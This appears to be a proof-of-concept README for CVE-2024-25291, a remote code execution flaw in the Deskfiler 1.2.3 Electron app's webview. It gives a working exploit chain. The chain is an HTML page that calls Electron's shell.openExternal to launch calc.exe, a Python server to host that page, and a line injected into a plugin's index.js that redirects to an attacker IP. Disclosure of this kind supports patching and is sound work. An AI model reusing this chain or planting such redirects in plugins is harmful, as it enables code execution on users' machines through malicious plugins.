A Proof-Of-Concept for CVE-2024-25291 vulnerability.
deskfiler - 1.2.3 allows Electron webview in application, with resultant remote code
In this repository there is an example vulnerable application and proof-of-concept (POC) exploit of it.
- Vulnerability Subject: Open Redirect via RCE
- Vulnerability Version: deskfiler-1.2.3
- Manifestation of the Issue: Electron Webview
- Attack Type: Remote Code Execution
- Attack Vectors: To exploit vulnerability, someone must open plug-in.
- Reserved CVE Number: CVE-2024-25291
- Exploit explain
- In a specific section within the application, a section accessing an external link through a Webview through an electron could be confirmed. Therefore, through this, it is possible to achieve an RCE by connecting to the attacker's server
- Step 1) Prepare the attacker's server and make Malicious Plug-in.
<html>
<head>
<title>jruru</title>
</head>
<body>
<script>
const { shell } = require('electron');
shell.openExternal('file:C:/Windows/System32/calc.exe');
</script>
</body>
</html>※ If you want to test it quickly, create a server on the attacker's PC with the following code.
$ python -m http.server 80Note: ※ At this time, it is assumed that the plug-in is a plug-in generated by the attacker, and is only a normal plug-in with a code added to let the attacker server access. BareBone has been selected for simple testing
Afterward, add the following code to the index.js file in the BareBone folder path.
window.location='http://[attacker_ip]/hack.html'- Step 2) On the victim's server, execute Deskfiler and install the BareBone plugin through "Add new plugin."
In this PoC, we utilized a plug-in; however, we believe that with alternative attack vectors, achieving Remote Code Execution (RCE) independently is possible. Additionally, if server-side vulnerabilities such as Stored XSS, Reflected XSS, exist, RCE is also considered feasible.